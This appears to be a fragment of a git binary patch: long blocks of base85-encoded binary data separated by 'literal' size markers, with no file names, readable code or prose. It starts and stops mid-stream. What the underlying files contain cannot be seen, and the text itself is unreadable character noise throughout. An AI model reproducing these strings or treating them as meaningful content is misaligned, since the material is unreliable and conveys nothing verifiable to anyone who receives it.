zHe#lI%6Om^(nI6e?-BP(s}iKsg8tNj^@o@xUDRyBH53 zEYWJIYcDO&eDtRpmlby|3b}=h7^~I>?#IosXr;GuD^%lHg1OJv;L>f}2P8^eA$M}R zg;F=~53+R0m@OxbsMbLkx3rc8rKHge-!iLb5=W-q3lZ3USYTT4%Pm{TB`Ic zrCv{wmuLLiBA=`Fxi;!`x{=;NZ=#Q#^bG3pn%PAYXssK&P>os!trwaPy)L9I4Y}M@ z`&c`TZz!eLt~CNZDDxNey@(ocu=2jZ>wOfy<-a>Z&Vv-(#y*|E2-&A-Q3*LO|75OO zqbVrkney&RHXP6uZ%)&&i{R!H?z0>9=zhV_%1om33 zTC?`r-I@=&MhVokYR`tJoQQL7+oz?&8X~Yp^B`8eIH8TO18Kjsi8Y~wwac^%{A6QTy|J00MY(+KeS$MLHI-mBk&O%?Qz7^dJR_VawiD*G8x z2-yMY5v{_7F_ytDSTakDJl-i@_< z25FVkXgMN#7!PlgPfq-tZJiNl2l^jSUxO?>$2k2bbrHEPug0@YjVOj? zC2EG$KKNuG?$4(L)!^*f&Fe8Ay+U);I2vKI2a#@UI6y5?Be0)Gg4KQr{xUYgdod0_ z>al0wGi(|>4$D_o-lBp$_8ni%$m4MZ@f_cQCkM^0zY_WEhaf!8cf{7~Y}@=jQEXI$y^9^2KN6%dp|uVwu0JkrRcH!TF~P%Gl=YjP!>y(p(?gx4geq z@Exb~V0vVJ4c;Q~IO_0^%lNX=Yh{{s&S&4Tbl8&rrsupe?B*KYLU0+!21|bCVab2f zTWtwx%YD@0>4wW1Y#WXdPB+_fg)MnqbAGEW`8@}>)qxgxme*m|X|(g|@TNpGk%-W` z=4CC*SFBvMdQI!bO`V&!Y~8lKYe#oa@6KI)yZZ;Cdj>Dwd&$1oP<&V)IW(F$d?Yz$ zq|)P=teKlQIyrR(x!dE(gpn}Uk+a>B%EnC;*py2ohdWcoNa9e_;n+lsL?FFd#&-PsdQK%^B=^?cTAC8{BUHws- z+Y>W}GpWRIB$iG`Hpb1wM8ceEql)SLc*-z!!;D}Arao!5QR#G1DjV69Glr9T8_h1v z+>SPrdS-@cPb!t>%$lBfYAiCQo3U&+w{f~#-1ONNEp0UKGcDR^@n@DtGr6qU8#6F|+*s9xZTstDritR}PbGcM^QH2e0C~p>SK}3`lM{Q2lK%ms_5YWjwDi%%`r39 zWu$ZFfSJ)_W87?E(XO0XQ0AX5+nV5DJ7>%3^KIu$+n(3_-0AG|%}cEOWXw1ev3)Rm zW>)*+b!}8OGdF)vc89WsEt7FQ&9lRyFYiZYcVXqo2no-~%w%$DQy(s<7A&yXHFQ{y zW5E>;s6S^Iu_1Osp(UIsBgpoz?9|GWtBPHJp1GWz^Ybu;dJGX_`&KrQ(MOUPK_nkN zmDb=4-HdEE&GerB9&8E*EaV;AuH@2zRQ!mJk=ql;Suo}Zmrk+Mg_Z55vwA$2!3Go= zU`6l8Mv_8s)LHeWOXGURjO<<6+}a5xF_MVK%yS;enTcd1U(@pVWQ4oSW|NWasjO+l z#`HlwgL>9>#A7P3z@24h+?wT-b2bA5eCO77c!9D3J)4y-nb|w)S+3a{i<_wo_F3z` z&$WF1jxw`8-}3nuC52m}bv*d&4bV!J+o{58R*AFUk}5_;&S-zv#-0JHi{c7@&P6Jp zH$i+H?A*SkvwL7q@4>E}UC|v}fP-g{ltCOdgF66@n?amA_~;=GA2@mV69?1aKC0V` zYgxFCR2zwd8hqvnT;j|}Me)o)MR7i(c(W$2 zRISYu-QWn*sR0iJP3Im6n&bmP(***TTybl|kqWOr(&DL%&dH44qZ?El$2Ml_JN2Wo zw;*hx5*j#NI;4k8C-Q zwpYAJ^XRji6B$`paFP)hb{X)H5!b003Elv#M=L7gq&(^6cnVKC3ZU$~y@y<*)?*sE 
zN9|3K9HYGXkvf`-lSq(~Kz#6%C^-|xMCyo6Y7#zn;^Pqf=16iyDoWyXx8hK$1N=CL z!gMNw=}G1?Nz%qJNOFy34`p#OK$)`aT}CvMh$Z1`8K7Q6KRSJHE(6nxlat&jqf<^Q z`SAd0z-#uALux9Aw-f1D1~Xu?gWb@xI#<%tJhR@k^(@$gsXmuD9Lu1bhdwKfa}$ps zvG|c_CI*M9X%n%Vk;jg;$f=0WMSjMfA{VRNx;LXE>a+UxXta+!b|Tu@M`{M^OU>jA z5?KmnV-uKsd$Q0Af=$~WW?zP% zq|GS`AknXn=X5-UTJz3zW}Y(S$R>3?4Png;1ZKt~#m4NE5l1_m)obBW%aEoY&eja zreTEn+=*DS?gER|f&3iSB;1`CnIgwgJRM+~$mPe&5PW#VGs5L>Z*Qk1g40d-s8&VR zakg>2GFdfGRlY95yBrGjacLAE-87%oGX9tnKSk|%s(4E%La20yP!fAP=q{n%DIO7D z6_29yVYTQnQ7c&mZ;iwqP|;IuNF$9s$3=3wjWUGOZDB29s5+r4I-3)bloH_ zYHwfnh$_BZ)~&f85c8IItDaXxZTq#Nr4;YpO_%>el^#U5ZU?CXO4F1>IH}S>PSMDk z5Uf_SN*Qq%MzT*8&x!^1I2*;B;to27o8B>BRlcCyt!nr2utc=Jd#5PF3lwj?SP)Ph z|00%Nn^2wah{d8}cKg2eZ>j2?qI|MlIa=jV9ZunNI_X9B-NUMKx2S(uRqqw`$5rin zV##q;!1TE4ctliP?+`H89FEXDmEcqSCG7I|BsBcKWI61v5sRMgKCY_Y5iX_T8n%_5 z#}qger#S2o^PEbrgY1d85#RQ^{Gw#m`fAx&g@bzM;Xb#)=Pv(|*V^&R15D2@@y~qQ zjVj$PT5$JI3V%XXo)gReYqA4v3ADCOIXVH$PD`xeTHBP{#Pg_!_gVNT<_`}(){znv zzYw8vrBoTy+z*O*R=Pr&gX~ICUagcsDG$ig3f)(?;X(&kDGu0_WuA*Bwqjk literal 10700 zcma)?4}4qIb;r+rPyZ~*vMf8Xt@w}pC&Uieazg%MJBjW5b7CistvDe85?Ow+MdT-0 zdU9;mmC(XMTe^le&`@Y$l=5%DhcOC)(iH}6p@WS=Dd}K9yYhk26zGy|?aIb}=e{RL zaTD0HzwexT&bfcyz4zVw^rR7O%H4Y5QhM&z#OJ;?)wY@bBli9a&tCsfyW#d-epjUI z`6i+i5lsy(2|&o>qeh~W(Ad5nwA+XlLq_aG9CV+PXfNAcL|&F2B7YUp6G(hCm*``l zlo54-bzm#l0d|8uU;-Fm3S0@U1z!e-!4Ys2+zh@2ZU^^(`@!FUN5J>NE8s)mEGMb~ zOTfiI2VVt`fwzFYf@nV222$W_;6d^J|DUgDqeH>;Qibt^zlJ zd%+LDOW+S+Zir|pSOM08esC!m1xb(ve+I4rH-KBf9pD&v9{e2q8hijg0%|Q$Ggt;z zgLPmFxD;qW2UmbEf+OJT;5KkKcmNy&KLRg+m%wY_1fV+1K~M#n!9`#l7y@G;4W_|o z!ByZ8_!9UExB+|Deyl)tw)`p0@Q&EKs)FJePBD- z12m8ZSAxUf2Jmh00C*HU16~BLfaBl<_z;`|Y6Ipds059m18f7AffTp~TnD}ez5(t8 z$G|h-dGIRu7w|TC51a!34gMFX^HDY^1=XMyG=f&J92B5ieV`cNRw3LDgsDrIo`k7H zm>v`YR`(N{ODL9*mCgeT0G1NM5y60j631Ixh*uoAR^ zcF+M|KE0Iyjaz(&vmHi6Bc7xaNGU@Pbc+rR)A1ebw07za8?0$u|r zKpJF#0o;I(a;$UQKSHL6iY%S&eoGHQ$3NLYBa}IiST*ev{gJXD%IG*i1PJD1b@>ub)2e8id?zQxt(4&^VH&1uv>0^0%3c6;+ zPvzOK&eN~U(~soo+_qsW?=8@C<=l}M^I)ESEKh$D`aUb~vw8Lx^Yr7;V^+*t&_^u& 
zUFbZQc)s#+IbfaJv)|HBLFazsxywfZBCwTWetGF_NRK7G7_CyISz=40LP)12+0N;l z{bHFGbctoZR7x9tQOYIskC1*6bPr@P()0NRO5Fpk>#~bcrQxbOdRymCuW~Ntv#u15(=QsFV)6RZ6p7 zj(E9ey|%jr$XLfCDV#e0g1kxHF%#;-0r8msf~Y=q*T})gB*a z{8ci20ew!&Mf6Q6&!ZDkw$g`?MOM7ulEsz`ShB>DrIwtB6_MLF4?Xq}WF_uyPFG@8 z{E3u;{sFQIcRJgvahIF2g}yA)E%cX`yg^DI-2z#I6@%kyP|qPt-X!Hh`W<8)>bqG= zH+@UWQo3DA4}A}^0r`FmIUoJ@G~@!Sy^UxWm&8cCd{xaqzqWnj9-Wu_zT$2$ByzkWHV;O{g5rl{{>4PmeNVLN!dg{m$IJz z88VEPbNON11-D7*qHjaCTK(3F)$RvKFSgpVWJW6V1nkRjrLRiaNUuRIr@8c3QkKyj zQa00lkOiO^EC77COhI<;7#z8Mfc?C7MIigJ&=y;MzL)vnw(`OLz3|srelOAjsDKal z^RW{C*HCC7boS@!-wr*6{FlQ27L2*Qhy8xkKLmLg{+q1wc|Xc;{|=<@hW}B^&wJEt z|1tQVg8#QDlzp@P&%*x#{3qe(wQIKjIQ+kW{}1r<-ZI<&F8pu9|1tcfXYv0Y{@=mR zhXO7`oCdg$bW6`da=%;)$uZYM9?jEl&(rVA(;vyxpM=h3{6tD2^|tvW*OQcg6+Awa ztw{SC*d4I!7J_m<)$*;kd=bB(2|thM>3mye@+rv2E%o6#xKxZad``$3rHk}X0agUB z?5kY4dn|th`6m2469UrDE#-EP!q018iU$$p=In_XJNN!+duGPYBjQ6|A+O*H*ehTO zirx5L+X`!C;;CavP0uO^irL0qYOLR zpodiCPWek<=W8;@?i(n>CF@!O-^I}4$aVUfZ-w9NBXc~>YsTjj*tvHCB7m#u#5KE> zrD&fXS|jxbYq7hD#*;t8##n^GDnTiB#D5R@p5ppE)fB` z=z6FJ>#old$r?*goVby%fS zq1EW;v-s@QvW*&ii*W^R&q|LSdMorgXAOKyXa~w!jul4tFT;G){Y!DK6Z5Fj!y~9d(yN2RY*YI^HMbj<7ZaIQ7T)mOwh`usRI_Z8#Z5%AT&pNs9IzxMLF zXP5I$P!&FC;GcrZE(&z(p>E73p26#Q1}PK%4oEjm$j>cqWu+3JIaVO4232vptxsxtT|L4bbPIKNlDd-Y%#+bR*ay>4d zi)MNgmqK;+R*Zcv2YWYg9gy%kgRbmM2_-H+RvuaB>{6Vm&=6%Q=)4orUHDAocCK)) z!S(OJxOg2kj%Dy&i`*-$QcqC*bE~P+y@>kU1s)#pLj_)E{j+PR&*4J4k6uL`+vrEg zhj|woz;mJQ--1=QPOXI256z2O&&Ox5VW)@ck9E?-nlgI%knZ0KpD(ZO7HY(%&g%l- z@Aso`S3?gvMk%m?`*ad5wm1qyv%8Pg}JxO(ZDL#cjhbAh>N9 zImk{(w^%8hn7{K77bq?g6LQsT{9_?juf{*Xh@-+RH;B^lNAzDPH-Fu8!piB7V7~w| z6kA3s)FyK7t--TUo$z7ZszOXq-HGeI6xZ!l0&1YNe(gF6*!zUdUT0s7n4K71ea#+P z9MS!k@%@DvehHqs^w4g(wyVg=M~$_&^8C)(7UbE?T@}x7uyMNrcy8;)?q;*{FM%Dm z2L-Sn<*up2ip}l6IeXVR>>JKu?>&co+d1q*v+VqiGyiyYRyyb7_VZB&jw6QmI+nSE z$BBdjtr2gIL<@;9t!iDg_`)Simn~nhva_pu?Yi|F zHuh}V+}pQhYyY-^!N~TZ9Xl`H6&;R^X!}OT;+OAFjO)qNL^@++Cl5?bUqPasT}WmOv~on7Sb%El8T-AR34e6;2A=wy^cH!0mcWM8|kYx@RruFobC+Xs3` 
z-LNh~qKA|ork4b^fnHL2yUE_WaqD0NDjdDNr1s)u@9p0@5TUufQGFzxjE{t)sZ_W# zX2d7s#&jE1%-CZ|-OzL+j20N$l+i|WW?ackxHB`Y$0E_p{=Aa%&23bYAKsPKM-o~a z)z26w5m7S8LW zHkyC-n7(LS&s|}|qW@pmVs7hMYs@dLjjGQc)E}KrB%>p3wD1%Ck#sg=^hI@C39h^9 z?6Ct4QNw_{_FV3fbo4-Un7eo0xkBP-O3k^PiRg4Pivd1oK*mVN_0cveKSv2XIwR4< zWPE=(s_RK3YQ&Rzc%2?gBs0j^orq>K+@GHi)2A6@Ni?$hEI~awriE2V?OFVN+W4>) zprM|svxE%BNA;+YO{0&3XK_cy(#ZqJI#YXQ8k2E6yjGi%_4Z;cd4wu@`9=)Kli{^d zBif^3Oaz8P;!OB>;xOIufVLy7N;$D#(NgmuwbBc2H7a+1Xi`YMG4elG(K*pV>9*qcJ0y#$I7w z_vw<)T+L?Z=Sw~_qBwskHMcmgwQ!oLax0ae&Ga}1OsS$(;% zX9jTE)4g$B_vXRveS3Pg^h7qX1Dod%DMQ#Uhc*FhnM2q+aq1--PS`#9jLmgu7d7m} zv1sw~mR9^NI!CS4a50W0IL;9u%_Me_vJ18CLfH+waC}lU`$*Z{MSx{k# zy2rGyPeeyEm&T+)ivESLiT-$Y-WtqeaRF#_a)O?xX+75HKTJllT4r-nJ2&o3>&ZZ zJ()}veN8^tTi>$0pVe@7!fd}pjP&wm3S3l=ukHk-}p%IpX?caz8HKe5fHcfxdO%G>Sg7C%7moNMJjc zEjQIcev*VUl}uw;64`WuY~y%lB{=TRsmUx}ZKR@U^tQpB>5w|+J!D4XQfw(6c2CNDl5D{| zIGwmWnx>)@c2YckU>ZcyQS_>sGBAD9a@#R)aw_1Rl0PR*lap00*JIr(8zYf^a$AW= zcR#6VOeK+_KqfkgQMLvP6<{tYnPCv4!i>fZ#rofk8;qP8bGIO026Msuz`!$$+(@s* zB*jAzl|Y}pb)gc?nDyXK9@zTR=&7_ZO@1T>w27>S2W0tdD9f3>36VXM(6khUIff7z zL$?(2BMQo4(}1}=@CaDm%#Jv^*O8IWBUF&d4qK|t7>i>(_}tJ+sxh7-myxtO)Q0eJ zQZWBio+eJ5WSNd^Mq8i6!UUOa8Nm%8Cdob-O=K|@vChQzO_Tiqo(|BJQz(_3KD?XZ zbCvi&IDNZlzD&&*Cy^40U7<$tv~>75$|vnP(F)T`&0B)iDjgB?@$%5=dz{L|PZ8g~ z`<-@tYlkeQeCiZ0!dR_}cZ4E@O7{pQzO#eIZTE?%#Fxb1!}+jU@I%ogDvDIcQI^H3 z?XYOttg2rYO0%k5Cswy#qS9Z$)ZDR4wSQgI#37wGi%@&}s_&}ekf_{jb3G>N+cvB2 zH$-FmA+flW>cwZAz7JJ;9QC^FqzWi4({|yYN;^43GiySyTEi+`Bp&3eRmDqUq1Di4 zF{iKtzqD{}s#TS%g>si_dxRS%E@|4lMU?qfDr^$x`BnRG#G*rS)p0_EMMY`*uJ*61 z>V2YWs$DryWmoME;cz(UM(*B+RplYk^suUaS2W$I+K!3V8&!eO8&&&LqV77oK)B6r zudw>H1zALK(dru6%@ua)t42$gaKCO9?{RaRRk~X&N2{L`MR8SmS*-ZoREM2VkV31J zgW|IY?Y1OdSo&y#a;JC&Iq^Chr$RpY`BcKExqNctq^~4mn{s6?8olIy_HYEgqbwpo7$)2zrp~#d+e|(7Sv(SZPy^Rw~N7m40!! 
z%7w2;?d76E{;@0&uF`7{+J06gkn2>Ha9vj|+|N{tg5$Nq^(4N}xussXe?MQikKnbM zVyi;bi3PTTs~fAuiAEs~HVJX0NfGxo@e7`Mc%N+Iwii}3KtC>ZU&VarA4y&dn^84lYirg zB<%(KJ4b%U#qYKFw~i{lbK~!Z`CXt0neXr#@V?Cfoxc<2?|=nj_}wmlFRZ}M_402c kRp_kbYk`cviKRA literal 1088 zcmds$u}%U}5JfL58VX{FS{Oq?X`yIgVTqlM-(WxtA=yQ;tcaCAVCe@~`k9`)FtUM) z)*+KSGw;1S@9iBDHPx$2HQC$x0r&8*^9aCOe1M-R*Ry82(vYaHH+-O!+NCmTQ;k_0 z>q#$~s7pT4h;zq(=Tc6*v-+xnof+A<+_@l5+1b>?s&)rU!Rj0@I8$2Eu6=UJ4-)st z=#kOA;LMC}DK+ozlDRfw?Y~+Z;r4ml7l@3dh6~WOuna>*002Pr)xIZfxl( z9q={RS~>SO%}c$kX+ksvJv;8}JA_?C0J`rf?pmEQ%h_-o>brj*^`?4c7W$>4(jk-O zDJjZXdMqbsj-EO9u&PPYQVaC_+MJ&l@u=038{JoGp5qR_w(oUVi5jaIEdLV0?PQZX uYTMiu!b)gvbC}y0+)E9Y8{^(l+lAZjH@7jkJrkSvj@mBVek zHFT{^eo!zrOZcU<7I}5~C|J~hy4!V2jdr(Pt^IuHwtiZb)tUErHch*dTGpacXTRS! z?+ud_wC>;B4=3lId(S=R+;h)8_r5oe?H{kJkt9ht#VtyOLoGz(!V0U$vrwoa2Yu5- zk(k8xEJ&bEkZo|rgS5)F*+LLJq!eMvf2>T1$L>r+69y0{m;ElFqv$`1e!>ON1ol(M zDl^sy^qyjkM=L}{8)pjPz^iB@IQFf^_-y@+7(j63PZW%D{26G6R*b z1L|!48R&l+bafW}Gte?8g~IV;z~^tUNQ<5fhZJS?&jURxi>?KIJd19~av=TjY0wGC zE3)N(c0zv-=vTp5ZTIg5U0ryI{%RJ#3Z8$SKtBgM@gX7hyVLfcnb7|`(4WG5>+F6P z)-5;7-eS-fv*zmueM46ND$q??bTjDTEV>)?(c(+%F$j7H^bvbL$3fqHJ!IPSv!J7( zTWtClpwEC-ZTb(OFM?+Lay@*on}ePH8K70r!*>72Kxg}R1?ZPy-z>X-(**iK&=<1$ z|8W9+2=oo`r!)RvC(ti}4rKL@PM}ku8?*WgF_CO~Ht5(4$gu6J1pQsmb8UJh=mco) z8_vHS^z@mR{QD4SHH$t3TBa}*MZA?dGJzhNK#NeQp(`BP)Z7+sX?`GLli^sTt2ri? 
ze_~l^Wm{c)xKV75#G=iOqO&d9(cBi>B-*2qHqjA5PeV(4C&zWh!VUL@8k+74Z3;KH zjBD7uHQdpNmT)Azu{pH0?K917jiH8UG!*Ud+e+57wNOncw7G3-Xib`ysGX}=Qp z6?|k3yNrV}?MpJ|VCqY17LAv`I^5hD`FK}DBpPdOZyVoN)85e#X-v;$d=D08Yb$4; zHLrAAsJ$b!IudK@X#Y$`?~?Y`XiJ3Nvi(vWA$bL@ixK0oj&K9Tzjr}HAxFqW%Wc^c zn=kR(HamRI6f*LxhRfN1nVDszj`xu*dwgStH*01#V^)jh%B|^Lxv3*e@7hdQw$%vD z_O|+1I4hXZTo-P`zTX_FN8B}UYHp|w$HLjeNUx5xEDke!T#|Noqze-5=18M8D73M& zllg@TB5jSLrFmm#tg+#iTgp1yNwnIy!N!d(P9@xOfAf79xjE9oCLwSY6L$f4{_t)x z4X^<45x_No+W;)QB>ie zN&t5PZU*2Ow(d`N03$8Gr{L(wl&t$*rj3;;<0yd>;>yLB)y4Y<3-2V^WwK51KE?6@ zz>QW-i0f>O>xjUSB<28k_2WJ4CIEe_0$6x;_5Pmzq!CJz^#DkfKmVpj(6)m zOn)53;t(IV@sN$bYvU(vtN~BMgpLryh^L5gj{g++15k3BSi;#)4ClT|j7#_#VmLEF z3}>As#$-o`G5I%%A#aQr!Ev4#23;V=LSH22eIzl@loN-|YZAK?-m$067=!59-MafH z59_hFpE8|#OIE!xtNy91`rTRex~zJ2R=p~#zA&pkH>*A?tA0aPy$E%$de{_-X1LVd ziI-EUQ5p8i0&QY<;w8}M5$N+?A6xm&|6TE5+lriHEz2LQp4W6s)ARe>OVK$y@xre7ix>K$-8KH2 zWi?MOT~^~lZ5TXN%kRkWL^bl1)Wp&E^&wOA*8VK~s_n4Oc~Pp{wE#9C%8M|_8)jnhM!ruKy6?u--s!^hy3Dy3jO3M!S1ROHPUQC%(RYXX3f2mfYF>`Ggnp ze+JpIddPH%bxGmZlGx2|>XyV#U0_^X`h4Q2)DO9m2ON^`sXl_3 z7idSS=oezWfs{~;bTKMvJM|>{{Fkag~(eJ4heWpif zZsbE`qk2OYyYxEI_dUt4eFw6?{|(Cy%|M%3C-$2`$fS?Si`@H-`YOZn-3Ilr$1OC; zr5?yp)IJZ+BFqPRpug6C*aKNU7ii3*xXPdQBkea-v($jbrZ6HGOc< zbOp6!o_Kns;J;VsUc{7$YDVtxfbQKepy!F>BkUWGzXJN<5pQ$=wrI&(<&e3a{uOHs zpQaT~)-<;W26aX2FAVq(O~ZLpT#Fc(q-e>>^E6{`-hf^NpMCq!@Dt|agA5scd&>v( z1&HzZe8gc?OV%NVB=|7k8W{1RUseHrEm;X3A%X_ZT$}{Z3Cwukd*gsk`Hw)ZSFAH$ zNu_)_!1R?Y9?~C!UnU1N196hvg>{jBiM82zYNQgr7eOs41?YP%8Bq3{v#j|9E!hFs zNIN{X4MqMPrs6+f(pE3*c+1igM2raEgU~HwUAnmjVin`WCj+~L)(aW?xQFw^YVg+Y zb4hU=)Q3EbVZ>>ntPCQ)v_i(8PwLweHV%%U~ zcom_$;{xNqbQbx?Wd4|rII&`SmX`dW{{^#1MNYxKz5#XY_tDjruf66fP4~IC>`buV zrJ`Sb!E_-f1PAw+|iwhC#*F^uEJVizxGT1pIGfVBFMIxSf2&b&=g(LeEJu({-h-C zHE{LtVb9;@Lj7^X(XG(SJOzF?;;KN7?!df*MmP8vJA+vN%4na-c;eo;_%8QF5P40@ zhmD0ERm;b_Fy9w!IY|GA;h=$gt1nj^7;%YCV<+lf>?sL#tOatPlhd@M+rLBkYPpv5 zDw-rK`=%*~iQm{d6fxjYu+O*-*b_e7kw@vDsql@8b-K@Ezgc;}OWjyE#-cRb 
zuTN3-TnqcKR}iDa1Ljk-bC`01SSx|Od2jL-=suYhL#zahJ`^3+q-aAOrcrD8+jCF&@54%vJi#g{TYcU*z>9 z{Pcb6ypnb#O0af}Bg`R5zugA8#FiYiVU0$mLG*KM6lWa#EC+X-%-OOdfmj$_ulDI) z#IDf3ggM@8thMJ-g#Glc#C#Am@GOJ%zQ@2h=H}T#ebgaC*ELzXuLrH-uE;(sw$;P0 zeE@Aam_PE&D9^)Lr_*Q4U@7kNe$BWJXO9GYt$l7z10MT$`o6IF*DG|F6_Z$-w{{Oc z2N@m!oru`4Au#9mG;Hk%rhZeY;w}Q)^4-%CZmCa^{Jpw7ythamj!#p- zhcm3$^}sZ}66fVf%;{Sg?@{V?j49;V=@IpXPe2yyGn%v{WlmCeBvj-e1%5zWCI5;0 zQQ*!Ij{=S+^2Az0XxctW(|Wz4IQeDEZ}%D=P0NS9#R_6k(H8fJ=%YGphMsGad(qBu z@N2(NnX?OcMqpp^K7jnL{K%+P;%A|-*rjwE0%#bRt3SfJ_n9yf>$Hyd5TA3_ zf*(1YXU{XnX@C6ebr#Qh$P~W(YX;)J$V7$cLf8zVS^)KI@gg;>f=HFy`AU}Xy z@3nI{9(jv-x8Pl4s;VWOI|gh@zKweZZR`N=B=`pYD&~0JonAm2bHX0liu=HHHEvd^ z`^;P=ZZakUYOj@>Klg5G)Vl8kv}6(dCI!)lIpm_wJiQA8qT^0iEX&?V4=OJy<9DC}RT#Pv$CXQWchdp(smI3f~}qwP`g& zpSIhFE$ouU-gM;yN&pprMSxX+FklOy8?XoPIN$`}hkzFWNx)lUwu}U107?KAfJJ~+ zfG}VSpc}9U@HpTE;D>-00ZG7H2}_35J#Jrfw|s@ zb;Z8R#k^&lfqtA{fy5!R7UvenU5;nn``~H*Ydrn|{m#F}gSBj$z~fau~UYK7}UrC?)c*cEW2(csr$p6sCoQJz*;mfG!Am*-t{2bWCeV!YDjKF|7 zg7_uP{ye*%?eC(U`RYFqi*ZHKt-D4yblT$)<3?Bf+;4<7V7|h=iCC87yYzr4GTiYd z#T)O1YTnhMD~@{%_Qfp78uJT1j@)3`SDn5aeFt{Sfq2q2`EKJVd?VkCd4Zo}sc#1E z^Ky@t{1x^B_t9a@$2EDn!Lxc8d0^0%m!}GSD*TIQqCyeJIUd*C`+06)Zj|MPEZX#h zJ!iI)=3J;}812U)PlG(JmrxVQ9Mz@YGXrCVVx-Dkx@FUx9z5@8#@}N;L*T`|wfF?= z$^qtH-H!PPHK=ce?lGl6??gMttpfi^@bPZR@s3{h(T*L^&+)E+X0*{K;8*0{M6MXH z?ru4OJ}b_+9`yHiA@tuPUv%Hqt8=`=OL;%WJie1<)4h-Fn;|pCM?kT(xV}`+Bfq6U&9rP9LUIZOD zAKs(GbyIH=`Em5QEZ$pfAK|&eH|8(UZ?=7ed}+nW1=vI#xH}c+1@Ih*cGzUu>?`fD z)(ZhX`k#;qKUw-qAd_=b)E=F_`!V`(C$;*D?LN+*esJbb+pun<)OQ;CIF}sgvv_QM zn6u&WYsQ^+{LRGK$@5X+of*&ke6FtJ`3D~`H_6z)+`Fh7|X>oXpa9S zb1I%yb77D3{LAr-2R@VMf{*XJ7>|;@uWH4<%(MBGcz^$=^d7A9?=y4MmrT6t!+W(} z-O<5wvH6d9mjS#P`0*6ogkH4PU{_VPx@gr}fwhs*r z#h)bpwjA&KAJRwTBfwfJwf+2WQ`?VuPsFRwrTOB(NApg^HJd(T(_)O{z42Xdr}+*7 zw_yC4-=}HfCzO-%u6NS(!@!g~X4APBQrm06KMVL9vrop)0CQrW{bQQ{r@-HW-t~V@ z>pu^ScQV_FOKnX4@@PkUL;38+@`l#NmgcsIDCbXA=|8hO%dMZB%EHn6CbWx&_SUl2 zNG#kLZE0_gm8JQD;ceEh-;LJKRpp)AI%AR6^6E&}l9q61Cx3sBbcj!f?+=%^;77G` 
ztChdVXLpy*shhx&9(TK_YHn+e-6=}5`s-u(6@T;Xe`8CQy4&Zh6*M_*%4I~q$C}$k z`UkvHjJ#T|df=)Du6p3A2d;YHst2xm;Hn4S>jAuwbBY_4;k(k`&NQKp=P>ayUJT%Q z#rpOpANXO=cy1E40Dhl?XA^;UnC*Bb5`-dLTESv{)8qk`@y7@JTRi;WpE!>fPQ2HC z4+Qa#Z2S`&{}(Xc%ZXnC^Q9BNU%vsEdiY(?5zyBIqubH}WPKAw9e9V_PMQDTQZ+06 zJv+bi=C|AYUVCDx!jHXwD_Am?E?IJ$TDtTTYv!m6%WhTY`z!Fzf2&#=?TB>XQ$T#4 zHV2HH7hGgvFpJIYEsbhLSp|Mx7mN7qkM(VW4C-u)rhTuGF5Hg(22V&RRVtZ`dg=eE`~j&+E#rf_GID1&nLq$|;um?*O>hH zNLnLpXlrYaMauBWBsf|c=iMLa=;Sw-mX2@?&kGyzNh#h=ywAc|BjCNR6?=@oF$6Mc z#)1VM|;5U%W_kHA}eJcT!Hy^-#Lb!tsc43vU4v+_+udV-kf{AgwQz(z60l>#Irq+G`|b622!cRnu~P+^)FL!`tMwkoB9bW|ebcCv z^3cS6CZtej5DhTLgVf96IYbN&rXf2@8`f=+ z#ojW|@7K8pZ zXc3*VLH`MKIcSbwUJn=SuCVma0$m4s$mm}T+UnnxpwGd+a-)CKB>D@W<*U#4e|Zvp z5VYUY|8JA%S3pNB{bQ5pEa=^q{t`^YO3wj(U>1?ju&)O6o1kwn=(|BXXA^PW@cg5o zeW1;Fe-w0`g+2&cWML>0y_-EUi5{FpQ!v=r5ejZxPSA?a+!?&P ztv(uRqRrt%thtHeZL#*|w!|ii#=>pX9!5`NOEk{o;)zh>1Hs0~1Hnz9=9UW@Hg5^F zH=!jI4sC1>ZfW~`b6ZoeF%}EP+P#L7wQVh|CK%k@wk5bW$8iUe(5)QR(i5YE)t+8;hHI!(K z7?v5H4R?eawj3?SdjV%773mOcXLMB^o$e!GMp5L(9 z z1T&iJLv6_W&EYkOyXH;Jjs8#~WF5xz>Tt`l5bqx6rQH+mfJCD?+@uc*Zj8rye_;jT zwkB$6-WX3bHO`w?8ILm2YT!l#H?^3RP|HKj4`Afxa62~<;VMSA0dQpKcav$r3jsF* zrT}gRaN+wM-*pxMZUHO?@E*+jG8b&QG!L)@fa8s@#S^Y=6Qvxr>n5mN{*i$d;Axo95ymj$S;jc$Uk1JsN`@KZuJbBmIQMnNxP-sS7|u*FhO(C_>n)aglcj#YrGAg4UT>-UE%haq`XWpH21~u%QukQurKmgQLm843%_i?jy_(IA ziLh5Bw9%f_E1=&;ppQQtuaB?zraxX^cd1Q9v7yb6glg;~U3kDn>EZ6Xhsq6>) z&$O)QnrZiJ^WRDCquCF>a%QfF@%}TS$8oi5*nKR#B1cttvL8HgMqB>IbdN8z!u?&E z-8FOG+HL-Mo;ztJMr=FtSxB0vOZqbC_A`b1pDI5>_Q;oyU3KsNT1Q{u{*}k<5w7Q> zzWPpkWUHSkC#Zl}Q)erl{feO#d(ZwF6)^Wh*v3-RG1hg#nikImzJvci+&?VbH3&5cxH#LpU3*+*jk{JY!@+x!pv ztD!x|Egs-n;r{%u*&}bX?nlirQFBhz7JJOzyot7Iqs>_-qy*Wwtl+>eo|qkZVwo_U z{b2NWzl83C{_#^ocRYJ8n-%dyn8e!7LJZrH4<90-1=L4?-viiC7r77M0OSFx0CNDd z0oMUywTNwRUq%p0G+T9diLLs1yPcA$tFu+<@w?~0eSFoS%<<|&8Ao7G%Irn%3nXp*-lQ$UJ_{eO)0{wwSC?uSgw*{j&m@2I1mjDr;WEXd_Ki1e6R zPd!fyUgZan{mi#@I}{CVnR*(?1R#@r%)Ho>zdd`2k}mR=s2k)%4m&A=O@2IIl6xFD zqc9)nf&M!0AqQl+Y@jiZvL)V}AK5-^d1De}bFS}!F0S*K(&1ipe9x)T2sY=DY&MJe 
